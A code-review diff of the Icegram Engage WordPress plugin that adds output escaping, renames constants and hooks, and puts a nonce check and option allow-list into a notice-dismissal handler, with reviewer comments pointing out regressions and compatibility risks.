-                        <p><?php _e("Different message types look and behave differently, but they all have many common characteristics. For instance, most message types will allow you to set a headline, a body text, label for the ‘call to action’ button, a link for that button, theme and styling options, animation effect and position on screen where that message should show.","icegram"); ?></p>
+                        <p><?php esc_html_e("A 'Message' is a communication you want to deliver to your audience.","icegram"); ?></p>
+                        <p><?php esc_html_e("And Icegram Engage comes with not one, but four message types.","icegram"); ?></p>
+                        <p><?php esc_html_e("Different message types look and behave differently, but they all have many common characteristics. For instance, most message types will allow you to set a headline, a body text, label for the ‘call to action’ button, a link for that button, theme and styling options, animation effect and position on screen where that message should show.","icegram"); ?></p>
                         <?php do_action('icegram_about_after_core_message_types_col1'); ?>
                     </div>
                     <div class="col-2">
-                        <h4><?php _e("Action Bar", "icegram"); ?></h4>
-                        <img src="<?php echo $assets_base; ?>/sketch-action-bar.png" width="180" height="145">
-                        <p><?php _e("An action bar is a proven attention grabber. It shows up as a solid bar either at top or bottom. Use it for your most important messages or time sensitive announcements. Put longer content in it and it acts like a collapsible panel!", "icegram"); ?></p>
-                        <h4><?php _e("Messenger", "icegram"); ?></h4>
-                        <img src="<?php echo $assets_base; ?>/sketch-messenger.png" width="180" height="145">
-                        <p><?php _e("A messenger is best used to invoke interest while your visitor is reading your content. Users perceive it as something new, important and urgent and are highly likely to click on it.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("Action Bar", "icegram"); ?></h4>
+                        <img src="<?php echo esc_url( $icegram_about_vars['assets_base'] ) . '/sketch-action-bar.png'; ?>" width="180" height="145">
+                        <p><?php esc_html_e("An action bar is a proven attention grabber. It shows up as a solid bar either at top or bottom. Use it for your most important messages or time sensitive announcements. Put longer content in it and it acts like a collapsible panel!", "icegram"); ?></p>
+                        <h4><?php esc_html_e("Messenger", "icegram"); ?></h4>
+                        <img src="<?php echo esc_url( $icegram_about_vars['assets_base'] ) . '/sketch-messenger.png'; ?>" width="180" height="145">
+                        <p><?php esc_html_e("A messenger is best used to invoke interest while your visitor is reading your content. Users perceive it as something new, important and urgent and are highly likely to click on it.", "icegram"); ?></p>
                         <?php do_action('icegram_about_after_core_message_types_col2'); ?>
                     </div>
                     <div class="col-3 last-feature">
-                        <h4><?php _e("Toast Notification", "icegram"); ?></h4>
-                        <img src="<?php echo $assets_base; ?>/sketch-toast-notification.png" width="180" height="145">
-                        <p><?php _e("Want to alert your visitor about some news, an update from your blog, a social proof or an offer? Use Icegram Engage’s unique toast notification, it will catch their attention, let them click on the message, and disappear after a while.", "icegram"); ?></p>
-                        <h4><?php _e("Popup", "icegram"); ?></h4>
-                        <img src="<?php echo $assets_base; ?>/sketch-popup.png" width="180" height="145">
-                        <p><?php _e("Lightbox popup windows are most widely used for lead capture, promotions and additional content display. Ask visitors to sign up to your newsletter, or like you on social networks, or tell them about a special offer...", "icegram"); ?></p>
+                        <h4><?php esc_html_e("Toast Notification", "icegram"); ?></h4>
+                        <img src="<?php echo esc_url( $icegram_about_vars['assets_base'] ) . '/sketch-toast-notification.png'; ?>" width="180" height="145">
+                        <p><?php esc_html_e("Want to alert your visitor about some news, an update from your blog, a social proof or an offer? Use Icegram Engage’s unique toast notification, it will catch their attention, let them click on the message, and disappear after a while.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("Popup", "icegram"); ?></h4>
+                        <img src="<?php echo esc_url( $icegram_about_vars['assets_base'] ) . '/sketch-popup.png'; ?>" width="180" height="145">
+                        <p><?php esc_html_e("Lightbox popup windows are most widely used for lead capture, promotions and additional content display. Ask visitors to sign up to your newsletter, or like you on social networks, or tell them about a special offer...", "icegram"); ?></p>
                         <?php do_action('icegram_about_after_core_message_types_col3'); ?>
                     </div>
                 </div>
@@ -236,23 +253,23 @@
                 <?php do_action('icegram_about_after_core_message_types'); ?>

                 <div class="feature-section col three-col">
-                    <h2 class="icegram-dashicons dashicons-megaphone"><?php _e("Campaigns", "icegram"); ?></h2>
+                    <h2 class="icegram-dashicons dashicons-megaphone"><?php esc_html_e("Campaigns", "icegram"); ?></h2>
                     <div class="col-1">
-                        <p><strong><?php _e("Campaign = Messages + Rules", "icegram"); ?></strong></p>
-                        <p><?php _e("A campaign allows sequencing multiple messages and defining targeting rules. Create different campaigns for different marketing goals. Icegram Engage supports showing multiple campaigns on any page.", "icegram"); ?></p>
-						<p><?php _e("You can always preview your campaign to ensure campaign works the way you want, before making it live.", "icegram"); ?></p>
+                        <p><strong><?php esc_html_e("Campaign = Messages + Rules", "icegram"); ?></strong></p>
+                        <p><?php esc_html_e("A campaign allows sequencing multiple messages and defining targeting rules. Create different campaigns for different marketing goals. Icegram Engage supports showing multiple campaigns on any page.", "icegram"); ?></p>
+						<p><?php esc_html_e("You can always preview your campaign to ensure campaign works the way you want, before making it live.", "icegram"); ?></p>
                         <?php do_action('icegram_about_after_core_campaigns_col1'); ?>
                     </div>
                     <div class="col-2">
-                        <h4><?php _e("Multiple Messages & Sequencing", "icegram"); ?></h4>
-                        <img src="<?php echo $assets_base; ?>/sketch-multiple-sequence.png" width="180" height="145">
-                        <p><?php _e("Add one or as many messages to a campaign as you want. Also choose the number of seconds after which each message should show up. Showing multiple messages for same goal, but with slightly different content / presentation, greatly improves conversions.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("Multiple Messages & Sequencing", "icegram"); ?></h4>
+                        <img src="<?php echo esc_url( $icegram_about_vars['assets_base'] ) . '/sketch-multiple-sequence.png'; ?>" width="180" height="145">
+                        <p><?php esc_html_e("Add one or as many messages to a campaign as you want. Also choose the number of seconds after which each message should show up. Showing multiple messages for same goal, but with slightly different content / presentation, greatly improves conversions.", "icegram"); ?></p>
                         <?php do_action('icegram_about_after_core_campaigns_col2'); ?>
                     </div>
                     <div class="col-3 last-feature">
-                        <h4><?php _e("Targeting Rules", "icegram"); ?></h4>
-                        <img src="<?php echo $assets_base; ?>/sketch-rules.png" width="180" height="145">
-                        <p><?php _e("You can control who sees a campaign – and on what device, which pages does it show on, and what time period will it stay active for. You can run different campaigns with different rules to maximize engagement.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("Targeting Rules", "icegram"); ?></h4>
+                        <img src="<?php echo esc_url( $icegram_about_vars['assets_base'] ) . '/sketch-rules.png'; ?>" width="180" height="145">
+                        <p><?php esc_html_e("You can control who sees a campaign – and on what device, which pages does it show on, and what time period will it stay active for. You can run different campaigns with different rules to maximize engagement.", "icegram"); ?></p>
                         <?php do_action('icegram_about_after_core_campaigns_col3'); ?>
                     </div>
                 </div>
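Review bot: the three `<img src>` lines in col-2 and col-3 switch their base from `$assets_base` to `$icegram_about_vars['assets_base']`; make sure `$icegram_about_vars` is populated in every path that includes this template, because an undefined key yields an empty base and broken image URLs. Wrapping only the base in `esc_url()` is fine since the appended filename is a literal, and while these `<img>` tags are being touched they could get `alt` attributes.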
@@ -261,44 +278,44 @@

                 <hr>
                 <div class="feature-section col two-col">
-                    <h2 class="icegram-dashicons dashicons-editor-help"><?php _e("FAQ / Common Problems", "icegram"); ?></h2>
+                    <h2 class="icegram-dashicons dashicons-editor-help"><?php esc_html_e("FAQ / Common Problems", "icegram"); ?></h2>
                     <div class="col-1">

-                        <h4><?php _e("Messages look broken / formatting is weird...", "icegram"); ?></h4>
-                        <p><?php _e("This is most likely due to CSS conflicts with current theme. We suggest using simple formatting for messages. You can also write custom CSS in your theme to fix any problems.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("Messages look broken / formatting is weird...", "icegram"); ?></h4>
+                        <p><?php esc_html_e("This is most likely due to CSS conflicts with current theme. We suggest using simple formatting for messages. You can also write custom CSS in your theme to fix any problems.", "icegram"); ?></p>

-                        <h4><?php _e("Extra Line Breaks / Paragraphs in messages...", "icegram"); ?></h4>
-                        <p><?php _e("Go to HTML mode in content editor and pull your custom HTML code all together in one line. Don't leave blank lines between two tags. That should fix it.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("Extra Line Breaks / Paragraphs in messages...", "icegram"); ?></h4>
+                        <p><?php esc_html_e("Go to HTML mode in content editor and pull your custom HTML code all together in one line. Don't leave blank lines between two tags. That should fix it.", "icegram"); ?></p>

-                        <h4><?php _e("How do I add custom CSS for messages?", "icegram"); ?></h4>
-                        <p><?php _e("You can use custom CSS/JS inline in your message HTML. You can also use your theme's custom JS / CSS feature to add your changes.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("How do I add custom CSS for messages?", "icegram"); ?></h4>
+                        <p><?php esc_html_e("You can use custom CSS/JS inline in your message HTML. You can also use your theme's custom JS / CSS feature to add your changes.", "icegram"); ?></p>

-                        <h4><?php _e("Optin Forms / Mailing service integration...", "icegram"); ?></h4>
-                        <p><?php _e("You can embed any optin / subscription form to your Icegram Engage messages using 'Embed Form' button above text editor. Paste in form HTML code and let Icegram Engage clean it up! You may even use a shortcode if you are using a WP plugin from your newsletter / lead capture service.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("Optin Forms / Mailing service integration...", "icegram"); ?></h4>
+                        <p><?php esc_html_e("You can embed any optin / subscription form to your Icegram Engage messages using 'Embed Form' button above text editor. Paste in form HTML code and let Icegram Engage clean it up! You may even use a shortcode if you are using a WP plugin from your newsletter / lead capture service.", "icegram"); ?></p>

-                        <h4><?php _e("How many messages should I show on a page?", "icegram"); ?></h4>
-                        <p><?php _e("While Icegram Engage provides you lots of different message types and ability to add multiple messages to a campaign, we discourage you to go overboard. We've observed two messages on a page work well, but YMMV!", "icegram"); ?></p>
+                        <h4><?php esc_html_e("How many messages should I show on a page?", "icegram"); ?></h4>
+                        <p><?php esc_html_e("While Icegram Engage provides you lots of different message types and ability to add multiple messages to a campaign, we discourage you to go overboard. We've observed two messages on a page work well, but YMMV!", "icegram"); ?></p>

                         <?php do_action('icegram_about_after_faq_col1'); ?>

                     </div>
                     <div class="col-2 last-feature">
-                        <h4><?php _e("Preview does not work / not refreshing...", "icegram"); ?></h4>
-                        <p><?php _e("Doing a browser refresh while previewing will not show your most recent changes. Click 'Preview' button to see a preview with your latest changes.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("Preview does not work / not refreshing...", "icegram"); ?></h4>
+                        <p><?php esc_html_e("Doing a browser refresh while previewing will not show your most recent changes. Click 'Preview' button to see a preview with your latest changes.", "icegram"); ?></p>

-                        <h4><?php _e("Can I use shortcodes in a message?", "icegram"); ?></h4>
-                        <p><?php _e("Yes! Messages support shortcodes. You may need to adjust CSS so the shortcode output looks good in your message.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("Can I use shortcodes in a message?", "icegram"); ?></h4>
+                        <p><?php esc_html_e("Yes! Messages support shortcodes. You may need to adjust CSS so the shortcode output looks good in your message.", "icegram"); ?></p>

-                        <h4><?php _e("WPML / Multilingual usage...", "icegram"); ?></h4>
-                        <p><?php _e("Go to <code>Messages</code> from Icegram Engage menu. Edit a message and translate it like any other post. Icegram Engage will show translated message where possible. Choose <code>All posts</code> under WPML Language setting - Blog Posts to display, to fall back to default language messages.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("WPML / Multilingual usage...", "icegram"); ?></h4>
+                        <p><?php esc_html_e("Go to <code>Messages</code> from Icegram Engage menu. Edit a message and translate it like any other post. Icegram Engage will show translated message where possible. Choose <code>All posts</code> under WPML Language setting - Blog Posts to display, to fall back to default language messages.", "icegram"); ?></p>

                         <?php do_action('icegram_about_after_faq_col2'); ?>

-                        <h4><?php _e("I can't find a way to do X...", "icegram"); ?></h4>
-                        <p><?php _e("Icegram Engage is actively developed. If you can't find your favorite feature (or have a suggestion) contact us. We'd love to hear from you.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("I can't find a way to do X...", "icegram"); ?></h4>
+                        <p><?php esc_html_e("Icegram Engage is actively developed. If you can't find your favorite feature (or have a suggestion) contact us. We'd love to hear from you.", "icegram"); ?></p>

-                        <h4><?php _e("I'm facing a problem and can't find a way out...", "icegram"); ?></h4>
-                        <p><a class="thickbox"  href="<?php echo admin_url() . "#TB_inline?inlineId=icegram_post_query_form&post_type=ig_campaign" ?>"><?php _e("Contact Us", "icegram"); ?></a><?php _e(", provide as much detail of the problem as you can. We will try to solve the problem ASAP.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("I'm facing a problem and can't find a way out...", "icegram"); ?></h4>
+                        <p><a class="thickbox"  href="<?php echo esc_url( admin_url() . '#TB_inline?inlineId=icegram_post_query_form&post_type=ig_campaign' ); ?>"><?php esc_html_e("Contact Us", "icegram"); ?></a><?php esc_html_e(", provide as much detail of the problem as you can. We will try to solve the problem ASAP.", "icegram"); ?></p>

                     </div>
                 </div>
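Review bot: the blanket `_e()` to `esc_html_e()` swap regresses the WPML answer: the string in the `<p>` under "WPML / Multilingual usage..." contains literal `<code>Messages</code>` and `<code>All posts</code>`, which `esc_html_e()` now prints as visible `&lt;code&gt;` text instead of markup. For that paragraph use `echo wp_kses( __( '...', 'icegram' ), array( 'code' => array() ) );` or move the `<code>` tags out of the translatable string. Every other string in this hunk is plain text and is safe to escape this way.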
@@ -306,4 +323,6 @@
                 <?php do_action('icegram_about_after_faq'); ?>

             </div>
-        </div>
 No newline at end of file
+        </div>
+
+
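Review bot: besides restoring the missing final newline, the change appends two empty lines after the closing `</div>`; a single trailing newline is the convention, so drop the two blank `+` lines.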
--- a/icegram/lite/class-icegram.php
+++ b/icegram/lite/class-icegram.php
@@ -24,21 +24,21 @@
 		public static $current_page_id;

 		public function __construct() {
-			global $ig_feedback, $ig_tracker, $ig_usage_tracker;
+			global $icegram_feedback, $icegram_tracker, $ig_usage_tracker;

 			//To get trial related functions
-			require_once IG_PLUGIN_DIR.'lite/classes/class-icegram-trial-admin.php';
+			require_once ICEGRAM_PLUGIN_DIR.'lite/classes/class-icegram-trial-admin.php';

-			$this->version             = IG_PLUGIN_VERSION;
+			$this->version             = ICEGRAM_PLUGIN_VERSION;
 			$this->shortcode_instances = array();
 			$this->mode                = 'local';
 			$this->plugin_url          = untrailingslashit( plugins_url( '/', __FILE__ ) );
 			$this->plugin_path         = untrailingslashit( plugin_dir_path( __FILE__ ) );
-			$this->include_classes( IG_FEEDBACK_TRACKER_VERSION );
+			$this->include_classes( ICEGRAM_FEEDBACK_TRACKER_VERSION );
 			$this->cache_compatibility = get_option( 'icegram_cache_compatibility', 'no' );

 			if ( is_admin() ) {
-				$ig_feedback->render_deactivate_feedback();
+				$icegram_feedback->render_deactivate_feedback();
 			}

 			if ( is_admin() && current_user_can( 'edit_posts' ) ) {
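Review bot: the rename of `$ig_feedback`/`$ig_tracker` and the `IG_*` constants to `ICEGRAM_*` is inconsistent on the `global` line itself, which still declares `$ig_usage_tracker` under the old prefix; rename it too or say why it is excluded. Constants such as `IG_PLUGIN_DIR` and `IG_PLUGIN_VERSION` are also reachable from add-ons, so confirm the old names stay defined (or are defined as aliases) until every consumer is updated, otherwise a stale reference is a fatal undefined-constant error on PHP 8.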
@@ -63,7 +63,7 @@
 				add_action( 'wp_ajax_ig_dismiss_mailer_promotion_notice', array( $this, 'dismiss_ig_mailer_promotion_notice' ) );
 				add_action( 'wp_ajax_ig_mailer_notice_clickable', array( $this, 'mailer_notice_clickable' ) );

-				add_filter( 'plugin_action_links_' . plugin_basename( IG_PLUGIN_FILE ), array( $this, 'ig_plugin_settings_link' ), 11, 2 );
+				add_filter( 'plugin_action_links_' . plugin_basename( ICEGRAM_PLUGIN_FILE ), array( $this, 'ig_plugin_settings_link' ), 11, 2 );
 				add_filter( 'plugin_row_meta', array( $this, 'add_plugin_support_links' ), 10, 4 );
 				add_filter( 'manage_edit-ig_campaign_columns', array( $this, 'custom_ig_campaign_column' )  ,10,1);
 				add_action( 'manage_ig_campaign_posts_custom_column', array( $this, 'edit_columns' ), 2 );
@@ -72,9 +72,9 @@
 				add_action( 'admin_bar_menu', array( $this, 'ig_show_documentation_link_in_admin_bar' ), 999 );
 				add_action( 'admin_head', array( $this, 'ig_documentation_link_admin_bar_css' ), 999 );

-				add_filter( 'ig_escape_allowed_tags', array( $this, 'ig_add_escape_allowed_tags' ) );
+				add_filter( 'icegram_escape_allowed_tags', array( $this, 'ig_add_escape_allowed_tags' ) );

-				add_filter('ig_validate_custom_script',  array( &$this, 'ig_custom_script_validation' ));
+				add_filter('icegram_validate_custom_script',  array( &$this, 'ig_custom_script_validation' ));

 			} else {
 				add_action( 'wp_footer', array( &$this, 'icegram_load_data' ) );
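Review bot: `ig_escape_allowed_tags` and `ig_validate_custom_script` are public filter hooks, so renaming them to `icegram_*` silently disconnects any third-party callback attached to the old names. Keep the old names working through a deprecation window, for example by passing the new value through `apply_filters_deprecated( 'ig_escape_allowed_tags', array( $tags ), '3.1.36', 'icegram_escape_allowed_tags' )` where the filter is applied, or at minimum call the rename out in the changelog.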
@@ -110,21 +110,21 @@

 			if ( defined( 'DOING_AJAX' ) ) {
 				if ( $this->cache_compatibility === 'yes' ) {
-					add_action( 'wp_ajax_display_messages', array( &$this, 'display_messages' ) );
-					add_action( 'wp_ajax_nopriv_display_messages', array( &$this, 'display_messages' ) );
+					add_action( 'wp_ajax_ig_display_messages', array( &$this, 'display_messages' ) );
+					add_action( 'wp_ajax_nopriv_ig_display_messages', array( &$this, 'display_messages' ) );
 				}
 				add_action( 'wp_ajax_icegram_event_track', array( &$this, 'icegram_event_track' ) );
 				add_action( 'wp_ajax_nopriv_icegram_event_track', array( &$this, 'icegram_event_track' ) );
 				add_action( 'wp_ajax_es_list_subscribe', array( &$this, 'es_list_subscribe' ) );
 				add_action( 'wp_ajax_icegram_run_housekeeping', array( &$this, 'run_housekeeping' ) );
-				add_action( 'wp_ajax_save_gallery_data', array( &$this, 'save_gallery_data' ) );
+				add_action( 'wp_ajax_ig_save_gallery_data', array( &$this, 'save_gallery_data' ) );
 			}
 		}


 		function ig_plugin_settings_link( $links, $file ) {
 			global $icegram;
-			if ( $file == plugin_basename( IG_PLUGIN_FILE ) ) {
+			if ( $file == plugin_basename( ICEGRAM_PLUGIN_FILE ) ) {

 				$campaigns_link = '<a href="edit.php?post_type=ig_campaign">' . __( 'Campaigns', 'icegram' ) . '</a>';
 				$docs_link 		= '<a href="https://www.icegram.com/knowledgebase_category/icegram/" target="_blank">' . __( 'Docs', 'icegram' ) . '</a>';
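Review bot: renaming the AJAX actions to `ig_display_messages` and `ig_save_gallery_data` only works if the JavaScript that posts `action=display_messages` / `action=save_gallery_data` is updated in the same change, and that side is not in this diff. Note also that `wp_ajax_ig_save_gallery_data` (no `nopriv` variant) is reachable by any logged-in user; the prefix adds no authorization, so `save_gallery_data()` itself still needs its nonce and capability checks.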
@@ -152,7 +152,7 @@
 		 */
 		function add_plugin_support_links( $plugin_meta, $plugin_file, $plugin_data, $status ) {

-			if ( plugin_basename( IG_PLUGIN_FILE ) === $plugin_file ) {
+			if ( plugin_basename( ICEGRAM_PLUGIN_FILE ) === $plugin_file ) {
 				$plugin_meta[] = '<a href="https://wordpress.org/support/plugin/icegram/reviews/#new-post" title="' . __( 'Rate Icegram', 'icegram' ) . '" target="_blank">' . __( 'Rate Icegram', 'icegram' ) . '</a>';
 				$plugin_meta[] = '<a href="https://www.icegram.com/contact/" title="' . __( 'Support', 'icegram' ) . ' " target="_blank">' . __( 'Support', 'icegram' ) . '</a>';
 			}
@@ -183,7 +183,7 @@
 			foreach ( $compat_classes as $file ) {
 				if ( is_file( $file ) ) {
 					$slug = str_replace( 'class-icegram-compat-', '', str_replace( ".php", "", basename( $file ) ) );
-					if ( in_array( $slug, $active_plugins ) || ig_array_contains( $active_plugins, $slug ) ) {
+					if ( in_array( $slug, $active_plugins ) || icegram_array_contains( $active_plugins, $slug ) ) {
 						include_once( $file );
 						$class_name = 'Icegram_Compat_' . str_replace( '-', '_', $slug );
 						if ( class_exists( $class_name ) ) {
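Review bot: `icegram_array_contains()` must be defined and loaded before the compatibility loader runs; a helper renamed in one file but not in the file that defines it is an undefined-function fatal at this call site, so confirm the definition was renamed as well.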
@@ -221,7 +221,9 @@
 				?>
 				<div id="ig_es_mailer_promotion_notice" class="notice is-dismissible" style="border-left-width:1px;">
 					<div style="display: flex;gap:0.8em;padding-top:0.5rem;padding-bottom:0.4rem;">
-						<img src="https://ps.w.org/icegram-mailer/assets/icon-128x128.png" style="height:4em;margin-top: 0.1rem;" />
+						<?php
+						echo '<img src="' . esc_url( $this->plugin_url . '/assets/images/icegram-mailer-icon-128x128.png' ) . '" style="height:4em;margin-top: 0.1rem;" alt="Icegram Mailer Icon" />';
+						?>
 						<div style="color: rgb(55 65 81);">
 							<p style="font-weight: bolder; font-size:0.8rem; margin:0; font-size:1.1em">
 								<?php echo esc_html__( 'Get 200 Free Emails Every Month!', 'icegram' ); ?>
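Review bot: serving the promo icon from the plugin instead of ps.w.org removes an outbound request from every admin page load, which is good, but the diff does not show `assets/images/icegram-mailer-icon-128x128.png` being added, so confirm the file ships with the release. The tag could also stay as plain HTML with `<?php echo esc_url( $this->plugin_url . '/assets/images/icegram-mailer-icon-128x128.png' ); ?>` in the `src` attribute rather than being echoed from PHP.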
@@ -230,13 +232,14 @@
 							<p style="margin:0; font-size:1.1em;font-weight:400;">
 								<?php echo wp_kses_post(
 										sprintf(
+											/* translators: %s is the name of the product (Icegram Mailer) */
 											__( 'Start sending with confidence. No setup needed, no SMTP headaches. Enjoy 200 emails per month absolutely free with <span style="font-weight: 700;">%s</span>.', 'icegram' ),
 											'Icegram Mailer'
 										)
 									); ?>
 								<a href="<?php echo esc_url( $optin_url ); ?>" target="_blank" id="ig_mailer_promo_button" style="margin-left:0.5rem;">
 									<button type="button" style="color: #5850ec; padding:0.25rem 0.75rem 0.25rem 0.75rem; line-height:1.25rem; font-size:0.875rem; font-weight:500; cursor:pointer; background-color: rgba(255,255,255,1); border:1px solid #d2d6dc;border-radius:0.375rem;">
-										<?php echo esc_html__( $optin_btn_txt, 'icegram'); ?>
+										<?php echo esc_html( $optin_btn_txt ); ?>
 									</button>
 								</a>
 							</p>
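Review bot: replacing `esc_html__( $optin_btn_txt, 'icegram' )` with `esc_html( $optin_btn_txt )` is the right fix; a variable passed to a translation function cannot be extracted into the .pot file, and the escape is what mattered here. If `$optin_btn_txt` is assigned from a literal elsewhere, wrap that assignment in `__()` so the button text stays translatable.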
@@ -248,11 +251,11 @@
 						jQuery('#ig_es_mailer_promotion_notice').on('click', '.notice-dismiss, #ig-es-mailer-promo-button', function() {
 							jQuery.ajax({
 								method: 'POST',
-								url: "<?php echo admin_url( 'admin-ajax.php' ); ?>",
+								url: "<?php echo esc_url( admin_url( 'admin-ajax.php' ) ); ?>",
 								dataType: 'json',
 								data: {
 									action: 'ig_dismiss_mailer_promotion_notice',
-									security: '<?php echo wp_create_nonce( 'ig-dissmiss-mailer-notice' );?>',
+									security: '<?php echo esc_js( wp_create_nonce( 'ig-dissmiss-mailer-notice' ) ); ?>',
 								}
 							}).done(function(response){
 								console.log( 'response: ', response );
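Review bot: `esc_url()` is an HTML-context escape and converts `&` to `&#038;`, which is not decoded inside a `<script>` block; for a URL placed in a JavaScript string literal, `esc_js()` or `wp_json_encode( admin_url( 'admin-ajax.php' ) )` is the correct choice. It is harmless here because `admin-ajax.php` carries no query string, but the same pattern on a URL with parameters would break. The `console.log( 'response: ', response )` debug line should also go before release.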
@@ -262,11 +265,11 @@
 						jQuery('#ig_es_mailer_promotion_notice').on('click', '#ig_mailer_promo_button', function() {
 							jQuery.ajax({
 								method: 'POST',
-								url: "<?php echo admin_url( 'admin-ajax.php' ); ?>",
+								url: "<?php echo esc_url( admin_url( 'admin-ajax.php' ) ); ?>",
 								dataType: 'json',
 								data: {
 									action: 'ig_mailer_notice_clickable',
-									security: '<?php echo wp_create_nonce( 'ig-mailer-notice-clickable' );?>',
+									security: '<?php echo esc_js( wp_create_nonce( 'ig-mailer-notice-clickable' ));?>',
 								}
 							}).done(function(response){
 								console.log( 'response: ', response );
@@ -315,16 +318,34 @@

 			include_once( 'ig-offer.php' );

-			//include_once IG_PLUGIN_DIR . 'lite/notices/admin-notices.php';
+			//include_once ICEGRAM_PLUGIN_DIR . 'lite/notices/admin-notices.php';

 		}

 		public function dismiss_admin_notice() {
+
+			if ( ! isset( $_GET['ig_nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_GET['ig_nonce'] ) ), 'ig_dismiss_notice' ) ) {
+				return;
+			}
+
 			if ( isset( $_GET['ig_dismiss_admin_notice'] ) && $_GET['ig_dismiss_admin_notice'] == '1' && isset( $_GET['ig_option_name'] ) ) {
-				$option_name = sanitize_text_field( $_GET['ig_option_name'] );
-				update_option( $option_name . '_icegram', 'yes', false );
+
+				$option_name = sanitize_text_field( wp_unslash( $_GET['ig_option_name'] ) );
+
+				$allowed_options = array(
+					'trial_to_premium_notice',
+					'ig_offer_bfcm_2025',
+					'ig_new_admin_ui'
+				);

+				if ( ! in_array( $option_name, $allowed_options, true ) ) {
+					return;
+				}
+
+				update_option( $option_name . '_icegram', 'yes', false );
+
 				$safe_redirect = false;
+
 				if ( in_array( $option_name, array( 'trial_to_premium_notice' ), true ) ) {
 					update_option( 'ig_' . $option_name . '_date', gmdate( 'Y-m-d H:i:s'), false );
 				}
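Review bot: the nonce check plus the `$allowed_options` allow-list close the real problem in `dismiss_admin_notice()`, where any `ig_option_name` value was written as `{$option_name}_icegram = 'yes'`; now only the three named options can be touched. Two follow-ups: this hunk still has no `current_user_can()` check, so any authenticated user holding a valid nonce can dismiss notices and set the `trial_to_premium_notice` date option (low impact, but cheap to gate), and the silent `return` on nonce failure gives a stale link no feedback, whereas `check_admin_referer( 'ig_dismiss_notice', 'ig_nonce' )` would produce the standard "link expired" response.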
@@ -334,12 +355,12 @@
 					header( "Location: {$url}" );
 					exit();
 				} elseif( 'ig_new_admin_ui' === $option_name ) {
-					$url = "https://www.icegram.com/wp-content/uploads/2022/06/IG-admin-UI.png";
+					$url = ICEGRAM_PLUGIN_URL . 'lite/assets/images/IG-admin-UI.png';
 					header( "Location: {$url}" );
 					exit();
 				} elseif( 'trial_to_premium_notice' === $option_name ) {

-					$action = $_GET['action'];
+					$action = isset( $_GET['action'] ) ? sanitize_text_field( wp_unslash( $_GET['action'] ) ) : '';
 					if ( 'ig_trial_to_premium_redirect' === $action ) {

 						header( 'Location: https://www.icegram.com/icegram/pricing/?utm_source=in_app&utm_medium=ig_trial_to_premium_notice&utm_campaign=ig_trial_to_premium_notice' );
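Review bot: pointing the new-admin-UI redirect at a plugin asset via `ICEGRAM_PLUGIN_URL` is better than a hard-coded marketing host, but the raw `header( "Location: {$url}" )` should become `wp_safe_redirect( $url ); exit;` for the local asset (and `wp_redirect()` for the external pricing page below it) so the destination is validated and the headers are set consistently. Reading `$_GET['action']` through `isset()` + `sanitize_text_field( wp_unslash() )` also removes the undefined-index notice the old line produced.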
@@ -386,28 +407,41 @@
 		}

 		public function es_subscribe_form() {
+			global $icegram;
 			?>
 	        <div class="wrap">
 				<?php
 				if ( stripos( get_current_screen()->base, 'settings' ) !== false ) {
-					echo "<h2>" . __( 'Free Add-ons, Proven Marketing Tricks and  Updates', 'icegram' ) . "</h2>";
+					echo "<h2>" . esc_html__( 'Free Add-ons, Proven Marketing Tricks and  Updates', 'icegram' ) . "</h2>";
 				}
 				$current_user   = wp_get_current_user();
 				$customer_email = $current_user->user_email;
 				?>
 	            <table class="form-table">
 	                <tr>
-	                    <th scope="row"><span class="text-base text-gray-500"><?php _e( 'Get add-ons and tips...', 'icegram' ) ?></span></th>
+	                    <th scope="row"><span class="text-base text-gray-500"><?php esc_html_e( 'Get add-ons and tips...', 'icegram' ) ?></span></th>
 	                    <td>
 	                    	<form name="ig_subscription_form" id="ig-subscription-form">
 								<input type="hidden"  id="sign-up-list" name="list" value="d44945bf9155"/>
 							    <input type="hidden" id="sign-up-form-source" name="form-source" value=""/>
 								<input class="ltr form-input py-1" type="text" name="name" id="ig-sign-up-name" placeholder="Name"/>
-		                        <input class="regular-text ltr form-input py-1" type="text" name="email" id="ig-sign-up-email" placeholder="Email" value="<?php echo $customer_email ?>"/>
+		                        <input class="regular-text ltr form-input py-1" type="text" name="email" id="ig-sign-up-email" placeholder="Email" value="<?php echo esc_attr( $customer_email ); ?>"/>
 		                        <input type="submit" name="submit" id="ig-sign-up-submit" class="button button-primary cursor-pointer align-middle px-4 py-0.5 -mt-1 mx-2 hover:shadow-md rounded-md font-medium bg-indigo-600 text-white" value="Subscribe">
 		                        <br><br>
 		                        <input type="checkbox" name="es-gdpr-agree" id="es-gdpr-agree" value="1" class="form-checkbox" required="required">
-		                        <label for="es-gdpr-agree"><?php echo sprintf( __( 'I have read and agreed to our %s.', 'icegram' ), '<a href="https://www.icegram.com/privacy-policy/" target="_blank">' . __( 'Privacy Policy', 'icegram' ) . '</a>' ); ?></label>
+		                        <label for="es-gdpr-agree">
+									<?php
+									$ig_allowed_tags = $icegram->ig_add_escape_allowed_tags();
+									echo wp_kses(
+										sprintf(
+											/* translators: %s is a link to the privacy policy */
+											__( 'I have read and agreed to our %s.', 'icegram' ),
+											'<a href="https://www.icegram.com/privacy-policy/" target="_blank">' . esc_html__( 'Privacy Policy', 'icegram' ) . '</a>'
+										),
+										$ig_allowed_tags
+									 );
+									?>
+								</label>
 		                        <br>
 		                        <div id="ig-subscribe-response"></div>
 							</form>
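Review bot: the `wp_kses()` call for the GDPR label invokes `$icegram->ig_add_escape_allowed_tags()` with no argument, yet the same method is registered as a filter callback (`add_filter( 'icegram_escape_allowed_tags', array( $this, 'ig_add_escape_allowed_tags' ) )`) and so presumably takes a `$tags` parameter; if that parameter has no default this is an `ArgumentCountError` on PHP 8. Prefer `apply_filters( 'icegram_escape_allowed_tags', array( 'a' => array( 'href' => true, 'target' => true, 'rel' => true ) ) )` or a local allow-list, since the label only needs the anchor tag. The `target="_blank"` link should also carry `rel="noopener"`, which `wp_kses()` strips unless `rel` is allowed.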
@@ -442,10 +476,10 @@
